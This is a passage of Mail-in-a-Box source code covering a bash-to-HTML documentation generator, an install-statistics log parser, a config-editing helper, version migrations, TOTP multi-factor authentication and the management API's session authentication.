min_indent = 0 lines = [line[min_indent:] for line in lines] return "\n".join(lines) class Comment(Grammar): grammar = ONE_OR_MORE(ZERO_OR_MORE(SPACE), L('#'), REST_OF_LINE, EOL) def value(self): if self.string.replace("#", "").strip() == "": return "\n" lines = [x[2].string for x in self[0]] content = "\n".join(lines) content = strip_indent(content) return markdown.markdown(content, output_format="html4") + "\n\n" FILENAME = WORD('a-z0-9-/.') class Source(Grammar): grammar = ((L('.') | L('source')), L(' '), FILENAME, Comment | EOL) def filename(self): return self[2].string.strip() def value(self): return BashScript.parse(self.filename()) class CatEOF(Grammar): grammar = (ZERO_OR_MORE(SPACE), L('cat '), L('>') | L('>>'), L(' '), ANY_EXCEPT(WHITESPACE), L(" <<"), OPTIONAL(SPACE), L("EOF"), EOL, REPEAT(ANY, greedy=False), EOL, L("EOF"), EOL) def value(self): content = self[9].string content = re.sub(r"\\([$])", r"\1", content) # un-escape bash-escaped characters return "<div class='write-to'><div class='filename'>%s <span>(%s)</span></div><pre>%s</pre></div>\n" \ % (self[4].string, "overwrite" if ">>" not in self[2].string else "append to", cgi.escape(content)) class HideOutput(Grammar): grammar = (L("hide_output "), REF("BashElement")) def value(self): return self[1].value() class EchoLine(Grammar): grammar = (OPTIONAL(SPACE), L("echo "), REST_OF_LINE, EOL) def value(self): if "|" in self.string or ">" in self.string: return "<pre class='shell'><div>" + recode_bash(self.string.strip()) + "</div></pre>\n" return "" class EditConf(Grammar): grammar = ( L('tools/editconf.py '), FILENAME, SPACE, OPTIONAL((LIST_OF( L("-w") | L("-s") | L("-c ;"), sep=SPACE, ), SPACE)), REST_OF_LINE, OPTIONAL(SPACE), EOL ) def value(self): conffile = self[1] options = [] eq = "=" if self[3] and "-s" in self[3].string: eq = " " for opt in re.split("\s+", self[4].string): k, v = opt.split("=", 1) v = re.sub(r"\n+", "", fixup_tokens(v)) # not sure why newlines are getting doubled options.append("%s%s%s" % (k, eq, v)) return "<div class='write-to'><div class='filename'>" + self[1].string + " <span>(change settings)</span></div><pre>" + "\n".join(cgi.escape(s) for s in options) + "</pre></div>\n" class CaptureOutput(Grammar): grammar = OPTIONAL(SPACE), WORD("A-Za-z_"), L('=$('), REST_OF_LINE, L(")"), OPTIONAL(L(';')), EOL def value(self): cmd = self[3].string cmd = cmd.replace("; ", "\n") return "<div class='write-to'><div class='filename'>$" + self[1].string + "=</div><pre>" + cgi.escape(cmd) + "</pre></div>\n" class SedReplace(Grammar): grammar = OPTIONAL(SPACE), L('sed -i "s/'), OPTIONAL(L('^')), ONE_OR_MORE(WORD("-A-Za-z0-9 #=\\{};.*$_!()")), L('/'), ONE_OR_MORE(WORD("-A-Za-z0-9 #=\\{};.*$_!()")), L('/"'), SPACE, FILENAME, EOL def value(self): return "<div class='write-to'><div class='filename'>edit<br>" + self[8].string + "</div><p>replace</p><pre>" + cgi.escape(self[3].string.replace(".*", ". . 
.")) + "</pre><p>with</p><pre>" + cgi.escape(self[5].string.replace("\\n", "\n").replace("\\t", "\t")) + "</pre></div>\n" class EchoPipe(Grammar): grammar = OPTIONAL(SPACE), L("echo "), REST_OF_LINE, L(' | '), REST_OF_LINE, EOL def value(self): text = " ".join("\"%s\"" % s for s in self[2].string.split(" ")) return "<pre class='shell'><div>echo " + recode_bash(text) + " \<br> | " + recode_bash(self[4].string) + "</div></pre>\n" def shell_line(bash): return "<pre class='shell'><div>" + recode_bash(bash.strip()) + "</div></pre>\n" class AptGet(Grammar): grammar = (ZERO_OR_MORE(SPACE), L("apt_install "), REST_OF_LINE, EOL) def value(self): return shell_line("apt-get install -y " + re.sub(r"\s+", " ", self[2].string)) class UfwAllow(Grammar): grammar = (ZERO_OR_MORE(SPACE), L("ufw_allow "), REST_OF_LINE, EOL) def value(self): return shell_line("ufw allow " + self[2].string) class UfwLimit(Grammar): grammar = (ZERO_OR_MORE(SPACE), L("ufw_limit "), REST_OF_LINE, EOL) def value(self): return shell_line("ufw limit " + self[2].string) class RestartService(Grammar): grammar = (ZERO_OR_MORE(SPACE), L("restart_service "), REST_OF_LINE, EOL) def value(self): return shell_line("service " + self[2].string + " restart") class OtherLine(Grammar): grammar = (REST_OF_LINE, EOL) def value(self): if self.string.strip() == "": return "" if "source setup/functions.sh" in self.string: return "" if "source /etc/mailinabox.conf" in self.string: return "" return "<pre class='shell'><div>" + recode_bash(self.string.strip()) + "</div></pre>\n" class BashElement(Grammar): grammar = Comment | CatEOF | EchoPipe | EchoLine | HideOutput | EditConf | SedReplace | AptGet | UfwAllow | UfwLimit | RestartService | OtherLine def value(self): return self[0].value() # Make some special characters to private use Unicode code points. bash_special_characters1 = { "\n": "\uE000", " ": "\uE001", } bash_special_characters2 = { "$": "\uE010", } bash_escapes = { "n": "\uE020", "t": "\uE021", } def quasitokenize(bashscript): # Make a parse of bash easier by making the tokenization easy. newscript = "" quote_mode = None escape_next = False line_comment = False subshell = 0 for c in bashscript: if line_comment: # We're in a comment until the end of the line. newscript += c if c == '\n': line_comment = False elif escape_next: # Previous character was a \. Normally the next character # comes through literally, but escaped newlines are line # continuations and some escapes are for special characters # which we'll recode and then turn back into escapes later. if c == "\n": c = " " elif c in bash_escapes: c = bash_escapes[c] newscript += c escape_next = False elif c == "\\": # Escaping next character. escape_next = True elif quote_mode is None and c in ('"', "'"): # Starting a quoted word. quote_mode = c elif c == quote_mode: # Ending a quoted word. quote_mode = None elif quote_mode is not None and quote_mode != "EOF" and c in bash_special_characters1: # Replace special tokens within quoted words so that they # don't interfere with tokenization later. newscript += bash_special_characters1[c] elif quote_mode is None and c == '#': # Start of a line comment. newscript += c line_comment = True elif quote_mode is None and c == ';' and subshell == 0: # End of a statement. newscript += "\n" elif quote_mode is None and c == '(': # Start of a subshell. newscript += c subshell += 1 elif quote_mode is None and c == ')': # End of a subshell. newscript += c subshell -= 1 elif quote_mode is None and c == '\t': # Make these just spaces. 
if newscript[-1] != " ": newscript += " " elif quote_mode is None and c == ' ': # Collapse consecutive spaces. if newscript[-1] != " ": newscript += " " elif c in bash_special_characters2: newscript += bash_special_characters2[c] else: # All other characters. newscript += c # "<< EOF" escaping. if quote_mode is None and re.search("<<\s*EOF\n$", newscript): quote_mode = "EOF" elif quote_mode == "EOF" and re.search("\nEOF\n$", newscript): quote_mode = None return newscript def recode_bash(s): def requote(tok): tok = tok.replace("\\", "\\\\") for c in bash_special_characters2: tok = tok.replace(c, "\\" + c) tok = fixup_tokens(tok) if " " in tok or '"' in tok: tok = tok.replace("\"", "\\\"") tok = '"' + tok +'"' else: tok = tok.replace("'", "\\'") return tok return cgi.escape(" ".join(requote(tok) for tok in s.split(" "))) def fixup_tokens(s): for c, enc in bash_special_characters1.items(): s = s.replace(enc, c) for c, enc in bash_special_characters2.items(): s = s.replace(enc, c) for esc, c in bash_escapes.items(): s = s.replace(c, "\\" + esc) return s class BashScript(Grammar): grammar = (OPTIONAL(HashBang), REPEAT(BashElement)) def value(self): return [line.value() for line in self[1]] @staticmethod def parse(fn): if fn in ("setup/functions.sh", "/etc/mailinabox.conf"): return "" with open(fn, "r") as f: string = f.read() # tokenize string = re.sub(".* #NODOC\n", "", string) string = re.sub("\n\s*if .*then.*|\n\s*fi|\n\s*else|\n\s*elif .*", "", string) string = quasitokenize(string) string = re.sub("hide_output ", "", string) parser = BashScript.parser() result = parser.parse_string(string) v = "<div class='row'><div class='col-xs-12 sourcefile'>view the bash source for the following section at <a href=\"%s\">%s</a></div></div>\n" \ % ("https://github.com/mail-in-a-box/mailinabox/tree/master/" + fn, fn) mode = 0 for item in result.value(): if item.strip() == "": pass elif item.startswith("<p") and not item.startswith("<pre"): clz = "" if mode == 2: v += "</div>\n" # col v += "</div>\n" # row mode = 0 clz = "contd" if mode == 0: v += "<div class='row %s'>\n" % clz v += "<div class='col-md-6 prose'>\n" v += item mode = 1 elif item.startswith("<h"): if mode != 0: v += "</div>\n" # col v += "</div>\n" # row v += "<div class='row'>\n" v += "<div class='col-md-6 header'>\n" v += item v += "</div>\n" # col v += "<div class='col-md-6 terminal'> </div>\n" v += "</div>\n" # row mode = 0 else: if mode == 0: v += "<div class='row'>\n" v += "<div class='col-md-offset-6 col-md-6 terminal'>\n" elif mode == 1: v += "</div>\n" v += "<div class='col-md-6 terminal'>\n" mode = 2 v += item v += "</div>\n" # col v += "</div>\n" # row v = fixup_tokens(v) v = v.replace("</pre>\n<pre class='shell'>", "") v = re.sub("<pre>([\w\W]*?)</pre>", lambda m : "<pre>" + strip_indent(m.group(1)) + "</pre>", v) v = re.sub(r"(\$?)PRIMARY_HOSTNAME", r"<b>box.yourdomain.com</b>", v) v = re.sub(r"\$STORAGE_ROOT", r"<b>$STORE</b>", v) v = v.replace("`pwd`", "<code><b>/path/to/mailinabox</b></code>") return v def wrap_lines(text, cols=60): ret = "" words = re.split("(\s+)", text) linelen = 0 for w in words: if linelen + len(w) > cols-1: ret += " \\\n" ret += " " linelen = 0 if linelen == 0 and w.strip() == "": continue ret += w linelen += len(w) return ret if __name__ == '__main__': generate_documentation() File: tools/parse-nginx-log-bootstrap-accesses.py #!/usr/bin/python3 # # This is a tool Josh uses on his box serving mailinabox.email to parse the nginx # access log to see how many people are installing Mail-in-a-Box each day, 
by # looking at accesses to the bootstrap.sh script (which is currently at the URL # .../setup.sh). import re, glob, gzip, os.path, json import dateutil.parser outfn = "/home/user-data/www/mailinabox.email/install-stats.json" # Make a unique list of (date, ip address) pairs so we don't double-count # accesses that are for the same install. accesses = set() # Scan the current and rotated access logs. for fn in glob.glob("/var/log/nginx/access.log*"): # Gunzip if necessary. # Loop through the lines in the access log. with (gzip.open if fn.endswith(".gz") else open)(fn, "rb") as f: for line in f: # Find lines that are GETs on the bootstrap script by either curl or wget. # (Note that we purposely skip ...?ping=1 requests which is the admin panel querying us for updates.) # (Also, the URL changed in January 2016, but we'll accept both.) m = re.match(rb"(?P<ip>\S+) - - \[(?P<date>.*?)\] \"GET /(bootstrap.sh|setup.sh) HTTP/.*\" 200 \d+ .* \"(?:curl|wget)", line, re.I) if m: date, time = m.group("date").decode("ascii").split(":", 1) date = dateutil.parser.parse(date).date().isoformat() ip = m.group("ip").decode("ascii") accesses.add( (date, ip) ) # Aggregate by date. by_date = { } for date, ip in accesses: by_date[date] = by_date.get(date, 0) + 1 # Since logs are rotated, store the statistics permanently in a JSON file. # Load in the stats from an existing file. if os.path.exists(outfn): with open(outfn, encoding="utf-8") as f: existing_data = json.load(f) for date, count in existing_data: if date not in by_date: by_date[date] = count # Turn into a list rather than a dict structure to make it ordered. by_date = sorted(by_date.items()) # Pop the last one because today's stats are incomplete. by_date.pop(-1) # Write out. with open(outfn, "w", encoding="utf-8") as f: json.dump(by_date, f, sort_keys=True, indent=True) File: tools/editconf.py #!/usr/bin/python3 # # This is a helper tool for editing configuration files during the setup # process. The tool is given new values for settings as command-line # arguments. It comments-out existing setting values in the configuration # file and adds new values either after their former location or at the # end. # # The configuration file has settings that look like: # # NAME=VALUE # # If the -s option is given, then space becomes the delimiter, i.e.: # # NAME VALUE # # If the -e option is given and VALUE is empty, the setting is removed # from the configuration file if it is set (i.e. existing occurrences # are commented out and no new setting is added). # # If the -c option is given, then the supplied character becomes the comment character # # If the -w option is given, then setting lines continue onto following # lines while the lines start with whitespace, e.g.: # # NAME VAL # UE import sys, re # sanity check if len(sys.argv) < 3: print("usage: python3 editconf.py /etc/file.conf [-e] [-s] [-w] [-c <CHARACTER>] [-t] NAME=VAL [NAME=VAL ...]") sys.exit(1) # parse command line arguments filename = sys.argv[1] settings = sys.argv[2:] delimiter = "=" delimiter_re = r"\s*=\s*" erase_setting = False comment_char = "#" folded_lines = False testing = False while settings[0][0] == "-" and settings[0] != "--": opt = settings.pop(0) if opt == "-s": # Space is the delimiter delimiter = " " delimiter_re = r"\s+" elif opt == "-e": # Erase settings that have empty values. erase_setting = True elif opt == "-w": # Line folding is possible in this file. folded_lines = True elif opt == "-c": # Specifies a different comment character. 
comment_char = settings.pop(0) elif opt == "-t": testing = True else: print("Invalid option.") sys.exit(1) # sanity check command line for setting in settings: try: name, value = setting.split("=", 1) except: import subprocess print("Invalid command line: ", subprocess.list2cmdline(sys.argv)) # create the new config file in memory found = set() buf = "" with open(filename, encoding="utf-8") as f: input_lines = list(f) while len(input_lines) > 0: line = input_lines.pop(0) # If this configuration file uses folded lines, append any folded lines # into our input buffer. if folded_lines and line[0] not in {comment_char, " ", ""}: while len(input_lines) > 0 and input_lines[0][0] in " \t": line += input_lines.pop(0) # See if this line is for any settings passed on the command line. for i in range(len(settings)): # Check if this line contain this setting from the command-line arguments. name, val = settings[i].split("=", 1) m = re.match( r"(\s*)" "(" + re.escape(comment_char) + r"\s*)?" + re.escape(name) + delimiter_re + r"(.*?)\s*$", line, re.S) if not m: continue indent, is_comment, existing_val = m.groups() # If this is already the setting, keep it in the file, except: # * If we've already seen it before, then remove this duplicate line. # * If val is empty and erase_setting is on, then comment it out. if is_comment is None and existing_val == val and not (not val and erase_setting): # It may be that we've already inserted this setting higher # in the file so check for that first. if i in found: break buf += line found.add(i) break # comment-out the existing line (also comment any folded lines) if is_comment is None: buf += comment_char + line.rstrip().replace("\n", "\n" + comment_char) + "\n" else: # the line is already commented, pass it through buf += line # if this option already is set don't add the setting again, # or if we're clearing the setting with -e, don't add it if (i in found) or (not val and erase_setting): break # add the new setting buf += indent + name + delimiter + val + "\n" # note that we've applied this option found.add(i) break else: # If did not match any setting names, pass this line through. buf += line # Put any settings we didn't see at the end of the file, # except settings being cleared. for i in range(len(settings)): if i not in found: name, val = settings[i].split("=", 1) if not (not val and erase_setting): buf += name + delimiter + val + "\n" if not testing: # Write out the new file. with open(filename, "w", encoding="utf-8") as f: f.write(buf) else: # Just print the new file to stdout. print(buf) File: setup/migrate.py #!/usr/bin/python3 # Migrates any file structures, database schemas, etc. between versions of Mail-in-a-Box. # We have to be careful here that any dependencies are already installed in the previous # version since this script runs before all other aspects of the setup script. import sys, os, os.path, glob, re, shutil sys.path.insert(0, 'management') from utils import load_environment, save_environment, shell import contextlib def migration_1(env): # Re-arrange where we store SSL certificates. There was a typo also. def move_file(fn, domain_name_escaped, filename): # Moves an SSL-related file into the right place. fn1 = os.path.join( env["STORAGE_ROOT"], 'ssl', domain_name_escaped, file_type) os.makedirs(os.path.dirname(fn1), exist_ok=True) shutil.move(fn, fn1) # Migrate the 'domains' directory. 
for sslfn in glob.glob(os.path.join( env["STORAGE_ROOT"], 'ssl/domains/*' )): fn = os.path.basename(sslfn) m = re.match("(.*)_(certifiate.pem|cert_sign_req.csr|private_key.pem)$", fn) if m: # get the new name for the file domain_name, file_type = m.groups() if file_type == "certifiate.pem": file_type = "ssl_certificate.pem" # typo if file_type == "cert_sign_req.csr": file_type = "certificate_signing_request.csr" # nicer move_file(sslfn, domain_name, file_type) # Move the old domains directory if it is now empty. with contextlib.suppress(Exception): os.rmdir(os.path.join( env["STORAGE_ROOT"], 'ssl/domains')) def migration_2(env): # Delete the .dovecot_sieve script everywhere. This was formerly a copy of our spam -> Spam # script. We now install it as a global script, and we use managesieve, so the old file is # irrelevant. Also delete the compiled binary form. for fn in glob.glob(os.path.join(env["STORAGE_ROOT"], 'mail/mailboxes/*/*/.dovecot.sieve')): os.unlink(fn) for fn in glob.glob(os.path.join(env["STORAGE_ROOT"], 'mail/mailboxes/*/*/.dovecot.svbin')): os.unlink(fn) def migration_3(env): # Move the migration ID from /etc/mailinabox.conf to $STORAGE_ROOT/mailinabox.version # so that the ID stays with the data files that it describes the format of. The writing # of the file will be handled by the main function. pass def migration_4(env): # Add a new column to the mail users table where we can store administrative privileges. db = os.path.join(env["STORAGE_ROOT"], 'mail/users.sqlite') shell("check_call", ["sqlite3", db, "ALTER TABLE users ADD privileges TEXT NOT NULL DEFAULT ''"]) def migration_5(env): # The secret key for encrypting backups was world readable. Fix here. os.chmod(os.path.join(env["STORAGE_ROOT"], 'backup/secret_key.txt'), 0o600) def migration_6(env): # We now will generate multiple DNSSEC keys for different algorithms, since TLDs may # not support them all. .email only supports RSA/SHA-256. Rename the keys.conf file # to be algorithm-specific. basepath = os.path.join(env["STORAGE_ROOT"], 'dns/dnssec') shutil.move(os.path.join(basepath, 'keys.conf'), os.path.join(basepath, 'RSASHA1-NSEC3-SHA1.conf')) def migration_7(env): # I previously wanted domain names to be stored in Unicode in the database. Now I want them # to be in IDNA. Affects aliases only. import sqlite3 conn = sqlite3.connect(os.path.join(env["STORAGE_ROOT"], "mail/users.sqlite")) # Get existing alias source addresses. c = conn.cursor() c.execute('SELECT source FROM aliases') aliases = [ row[0] for row in c.fetchall() ] # Update to IDNA-encoded domains. for email in aliases: try: localpart, domainpart = email.split("@") domainpart = domainpart.encode("idna").decode("ascii") newemail = localpart + "@" + domainpart if newemail != email: c = conn.cursor() c.execute("UPDATE aliases SET source=? WHERE source=?", (newemail, email)) if c.rowcount != 1: raise ValueError("Alias not found.") print("Updated alias", email, "to", newemail) except Exception as e: print("Error updating IDNA alias", email, e) # Save. conn.commit() def migration_8(env): # Delete DKIM keys. We had generated 1024-bit DKIM keys. # By deleting the key file we'll automatically generate # a new key, which will be 2048 bits. os.unlink(os.path.join(env['STORAGE_ROOT'], 'mail/dkim/mail.private')) def migration_9(env): # Add a column to the aliases table to store permitted_senders, # which is a list of user account email addresses that are # permitted to send mail using this alias instead of their own # address. 
This was motivated by the addition of #427 ("Reject # outgoing mail if FROM does not match Login") - which introduced # the notion of outbound permitted-senders. db = os.path.join(env["STORAGE_ROOT"], 'mail/users.sqlite') shell("check_call", ["sqlite3", db, "ALTER TABLE aliases ADD permitted_senders TEXT"]) def migration_10(env): # Clean up the SSL certificates directory. # Move the primary certificate to a new name and then # symlink it to the system certificate path. import datetime system_certificate = os.path.join(env["STORAGE_ROOT"], 'ssl/ssl_certificate.pem') if not os.path.islink(system_certificate): # not already a symlink new_path = os.path.join(env["STORAGE_ROOT"], 'ssl', env['PRIMARY_HOSTNAME'] + "-" + datetime.datetime.now().date().isoformat().replace("-", "") + ".pem") print("Renamed", system_certificate, "to", new_path, "and created a symlink for the original location.") shutil.move(system_certificate, new_path) os.symlink(new_path, system_certificate) # Flatten the directory structure. For any directory # that contains a single file named ssl_certificate.pem, # move the file out and name it the same as the directory, # and remove the directory. for sslcert in glob.glob(os.path.join( env["STORAGE_ROOT"], 'ssl/*/ssl_certificate.pem' )): d = os.path.dirname(sslcert) if len(os.listdir(d)) == 1: # This certificate is the only file in that directory. newname = os.path.join(env["STORAGE_ROOT"], 'ssl', os.path.basename(d) + '.pem') if not os.path.exists(newname): shutil.move(sslcert, newname) os.rmdir(d) def migration_11(env): # Archive the old Let's Encrypt account directory managed by free_tls_certificates # because we'll use that path now for the directory managed by certbot. try: old_path = os.path.join(env["STORAGE_ROOT"], 'ssl', 'lets_encrypt') new_path = os.path.join(env["STORAGE_ROOT"], 'ssl', 'lets_encrypt-old') shutil.move(old_path, new_path) except: # meh pass def migration_12(env): # Upgrading to Carddav Roundcube plugin to version 3+, it requires the carddav_* # tables to be dropped. # Checking that the roundcube database already exists. if os.path.exists(os.path.join(env["STORAGE_ROOT"], "mail/roundcube/roundcube.sqlite")): import sqlite3 conn = sqlite3.connect(os.path.join(env["STORAGE_ROOT"], "mail/roundcube/roundcube.sqlite")) c = conn.cursor() # Get a list of all the tables that begin with 'carddav_' c.execute("SELECT name FROM sqlite_master WHERE type = ? AND name LIKE ?", ('table', 'carddav_%')) carddav_tables = c.fetchall() # If there were tables that begin with 'carddav_', drop them if carddav_tables: for table in carddav_tables: try: table = table[0] c = conn.cursor() dropcmd = "DROP TABLE %s" % table c.execute(dropcmd) except: print("Failed to drop table", table) # Save. conn.commit() conn.close() # Delete all sessions, requiring users to login again to recreate carddav_* # databases conn = sqlite3.connect(os.path.join(env["STORAGE_ROOT"], "mail/roundcube/roundcube.sqlite")) c = conn.cursor() c.execute("delete from session;") conn.commit() conn.close() def migration_13(env): # Add the "mfa" table for configuring MFA for login to the control panel. db = os.path.join(env["STORAGE_ROOT"], 'mail/users.sqlite') shell("check_call", ["sqlite3", db, "CREATE TABLE mfa (id INTEGER PRIMARY KEY AUTOINCREMENT, user_id INTEGER NOT NULL, type TEXT NOT NULL, secret TEXT NOT NULL, mru_token TEXT, label TEXT, FOREIGN KEY (user_id) REFERENCES users(id) ON DELETE CASCADE);"]) def migration_14(env): # Add the "auto_aliases" table. 
db = os.path.join(env["STORAGE_ROOT"], 'mail/users.sqlite') shell("check_call", ["sqlite3", db, "CREATE TABLE auto_aliases (id INTEGER PRIMARY KEY AUTOINCREMENT, source TEXT NOT NULL UNIQUE, destination TEXT NOT NULL, permitted_senders TEXT);"]) ########################################################### def get_current_migration(): ver = 0 while True: next_ver = (ver + 1) migration_func = globals().get("migration_%d" % next_ver) if not migration_func: return ver ver = next_ver def run_migrations(): if not os.access("/etc/mailinabox.conf", os.W_OK, effective_ids=True): print("This script must be run as root.", file=sys.stderr) sys.exit(1) env = load_environment() migration_id_file = os.path.join(env['STORAGE_ROOT'], 'mailinabox.version') migration_id = None if os.path.exists(migration_id_file): with open(migration_id_file, encoding='utf-8') as f: migration_id = f.read().strip() if migration_id is None: # Load the legacy location of the migration ID. We'll drop support # for this eventually. migration_id = env.get("MIGRATIONID") if migration_id is None: print() print(f"{migration_id_file} file doesn't exists. Skipping migration...") return ourver = int(migration_id) while True: next_ver = (ourver + 1) migration_func = globals().get("migration_%d" % next_ver) if not migration_func: # No more migrations to run. break print() print("Running migration to Mail-in-a-Box #%d..." % next_ver) try: migration_func(env) except Exception as e: print() print("Error running the migration script:") print() print(e) print() print("Your system may be in an inconsistent state now. We're terribly sorry. A re-install from a backup might be the best way to continue.") sys.exit(1) ourver = next_ver # Write out our current version now. Do this sooner rather than later # in case of any problems. with open(migration_id_file, "w", encoding='utf-8') as f: f.write(str(ourver) + "\n") # Delete the legacy location of this field. if "MIGRATIONID" in env: del env["MIGRATIONID"] save_environment(env) # iterate and try next version... if __name__ == "__main__": if sys.argv[-1] == "--current": # Return the number of the highest migration. print(str(get_current_migration())) elif sys.argv[-1] == "--migrate": # Perform migrations. run_migrations() File: management/mfa.py import base64 import hmac import io import os import pyotp import qrcode from mailconfig import open_database def get_user_id(email, c): c.execute('SELECT id FROM users WHERE email=?', (email,)) r = c.fetchone() if not r: raise ValueError("User does not exist.") return r[0] def get_mfa_state(email, env): c = open_database(env) c.execute('SELECT id, type, secret, mru_token, label FROM mfa WHERE user_id=?', (get_user_id(email, c),)) return [ { "id": r[0], "type": r[1], "secret": r[2], "mru_token": r[3], "label": r[4] } for r in c.fetchall() ] def get_public_mfa_state(email, env): mfa_state = get_mfa_state(email, env) return [ { "id": s["id"], "type": s["type"], "label": s["label"] } for s in mfa_state ] def get_hash_mfa_state(email, env): mfa_state = get_mfa_state(email, env) return [ { "id": s["id"], "type": s["type"], "secret": s["secret"] } for s in mfa_state ] def enable_mfa(email, type, secret, token, label, env): if type == "totp": validate_totp_secret(secret) # Sanity check with the provide current token. totp = pyotp.TOTP(secret) if not totp.verify(token, valid_window=1): msg = "Invalid token." raise ValueError(msg) else: msg = "Invalid MFA type." 
raise ValueError(msg) conn, c = open_database(env, with_connection=True) c.execute('INSERT INTO mfa (user_id, type, secret, label) VALUES (?, ?, ?, ?)', (get_user_id(email, c), type, secret, label)) conn.commit() def set_mru_token(email, mfa_id, token, env): conn, c = open_database(env, with_connection=True) c.execute('UPDATE mfa SET mru_token=? WHERE user_id=? AND id=?', (token, get_user_id(email, c), mfa_id)) conn.commit() def disable_mfa(email, mfa_id, env): conn, c = open_database(env, with_connection=True) if mfa_id is None: # Disable all MFA for a user. c.execute('DELETE FROM mfa WHERE user_id=?', (get_user_id(email, c),)) else: # Disable a particular MFA mode for a user. c.execute('DELETE FROM mfa WHERE user_id=? AND id=?', (get_user_id(email, c), mfa_id)) conn.commit() return c.rowcount > 0 def validate_totp_secret(secret): if not isinstance(secret, str) or secret.strip() == "": msg = "No secret provided." raise ValueError(msg) if len(secret) != 32: msg = "Secret should be a 32 characters base32 string" raise ValueError(msg) def provision_totp(email, env): # Make a new secret. secret = base64.b32encode(os.urandom(20)).decode('utf-8') validate_totp_secret(secret) # sanity check # Make a URI that we encode within a QR code. uri = pyotp.TOTP(secret).provisioning_uri( name=email, issuer_name=env["PRIMARY_HOSTNAME"] + " Mail-in-a-Box Control Panel" ) # Generate a QR code as a base64-encode PNG image. qr = qrcode.make(uri) byte_arr = io.BytesIO() qr.save(byte_arr, format='PNG') png_b64 = base64.b64encode(byte_arr.getvalue()).decode('utf-8') return { "type": "totp", "secret": secret, "qr_code_base64": png_b64 } def validate_auth_mfa(email, request, env): # Validates that a login request satisfies any MFA modes # that have been enabled for the user's account. Returns # a tuple (status, [hints]). status is True for a successful # MFA login, False for a missing token. If status is False, # hints is an array of codes that indicate what the user # can try. Possible codes are: # "missing-totp-token" # "invalid-totp-token" mfa_state = get_mfa_state(email, env) # If no MFA modes are added, return True. if len(mfa_state) == 0: return (True, []) # Try the enabled MFA modes. hints = set() for mfa_mode in mfa_state: if mfa_mode["type"] == "totp": # Check that a token is present in the X-Auth-Token header. # If not, give a hint that one can be supplied. token = request.headers.get('x-auth-token') if not token: hints.add("missing-totp-token") continue # Check for a replay attack. if hmac.compare_digest(token, mfa_mode['mru_token'] or ""): # If the token fails, skip this MFA mode. hints.add("invalid-totp-token") continue # Check the token. totp = pyotp.TOTP(mfa_mode["secret"]) if not totp.verify(token, valid_window=1): hints.add("invalid-totp-token") continue # On success, record the token to prevent a replay attack. set_mru_token(email, mfa_mode['id'], token, env) return (True, []) # On a failed login, indicate failure and any hints for what the user can do instead. 
return (False, list(hints)) File: management/auth.py import base64, hmac, json, secrets from datetime import timedelta from expiringdict import ExpiringDict import utils from mailconfig import get_mail_password, get_mail_user_privileges from mfa import get_hash_mfa_state, validate_auth_mfa DEFAULT_KEY_PATH = '/var/lib/mailinabox/api.key' DEFAULT_AUTH_REALM = 'Mail-in-a-Box Management Server' class AuthService: def __init__(self): self.auth_realm = DEFAULT_AUTH_REALM self.key_path = DEFAULT_KEY_PATH self.max_session_duration = timedelta(days=2) self.init_system_api_key() self.sessions = ExpiringDict(max_len=64, max_age_seconds=self.max_session_duration.total_seconds()) def init_system_api_key(self): """Write an API key to a local file so local processes can use the API""" with open(self.key_path, encoding='utf-8') as file: self.key = file.read() def authenticate(self, request, env, login_only=False, logout=False): """Test if the HTTP Authorization header's username matches the system key, a session key, or if the username/password passed in the header matches a local user. Returns a tuple of the user's email address and list of user privileges (e.g. ('my@email', []) or ('my@email', ['admin']); raises a ValueError on login failure. If the user used the system API key, the user's email is returned as None since this key is not associated with a user.""" def parse_http_authorization_basic(header): def decode(s): return base64.b64decode(s.encode('ascii')).decode('ascii') if " " not in header: return None, None scheme, credentials = header.split(maxsplit=1) if scheme != 'Basic': return None, None credentials = decode(credentials) if ":" not in credentials: return None, None username, password = credentials.split(':', maxsplit=1) return username, password username, password = parse_http_authorization_basic(request.headers.get('Authorization', '')) if username in {None, ""}: msg = "Authorization header invalid." raise ValueError(msg) if username.strip() == "" and password.strip() == "": msg = "No email address, password, session key, or API key provided." raise ValueError(msg) # If user passed the system API key, grant administrative privs. This key # is not associated with a user. if username == self.key and not login_only: return (None, ["admin"]) # If the password corresponds with a session token for the user, grant access for that user. if self.get_session(username, password, "login", env) and not login_only: sessionid = password session = self.sessions[sessionid] if logout: # Clear the session. del self.sessions[sessionid] else: # Re-up the session so that it does not expire. self.sessions[sessionid] = session # If no password was given, but a username was given, we're missing some information. elif password.strip() == "": msg = "Enter a password." raise ValueError(msg) else: # The user is trying to log in with a username and a password # (and possibly a MFA token). On failure, an exception is raised. self.check_user_auth(username, password, request, env) # Get privileges for authorization. This call should never fail because by this # point we know the email address is a valid user --- unless the user has been # deleted after the session was granted. On error the call will return a tuple # of an error message and an HTTP status code. privs = get_mail_user_privileges(username, env) if isinstance(privs, tuple): raise ValueError(privs[0]) # Return the authorization information. 
return (username, privs) def check_user_auth(self, email, pw, request, env): # Validate a user's login email address and password. If MFA is enabled, # check the MFA token in the X-Auth-Token header. # # On login failure, raises a ValueError with a login error message. On # success, nothing is returned. # Authenticate. try: # Get the hashed password of the user. Raise a ValueError if the # email address does not correspond to a user. But wrap it in the # same exception as if a password fails so we don't easily reveal # if an email address is valid. pw_hash = get_mail_password(email, env) # Use 'doveadm pw' to check credentials. doveadm will return # a non-zero exit status if the credentials are no good, # and check_call will raise an exception in that case. utils.shell('check_call', [ "/usr/bin/doveadm", "pw", "-p", pw, "-t", pw_hash, ]) except: # Login failed. msg = "Incorrect email address or password." raise ValueError(msg) # If MFA is enabled, check that MFA passes. status, hints = validate_auth_mfa(email, request, env) if not status: # Login valid. Hints may have more info. raise ValueError(",".join(hints)) def create_user_password_state_token(self, email, env): # Create a token that changes if the user's password or MFA options change # so that sessions become invalid if any of that information changes. msg = get_mail_password(email, env).encode("utf8") # Add to the message the current MFA state, which is a list of MFA information. # Turn it into a string stably. msg += b" " + json.dumps(get_hash_mfa_state(email, env), sort_keys=True).encode("utf8") # Make a HMAC using the system API key as a hash key. hash_key = self.key.encode('ascii') return hmac.new(hash_key, msg, digestmod="sha256").hexdigest() def create_session_key(self, username, env, type=None): # Create a new session. token = secrets.token_hex(32) self.sessions[token] = { "email": username, "password_token": self.create_user_password_state_token(username, env), "type": type, } return token def get_session(self, user_email, session_key, session_type, env): if session_key not in self.sessions: return None session = self.sessions[session_key] if session_type == "login" and session["email"] != user_email: return None if session["type"] != session_type: return None if session["password_token"] != self.create_user_password_state_token(session["email"], env): return None return session File: management/ssl_certificates.py #!/usr/local/lib/mailinabox/env/bin/python # Utilities for installing and selecting SSL certificates. import os, os.path, re, shutil, subprocess, tempfile from utils import shell, safe_domain_name, sort_domains 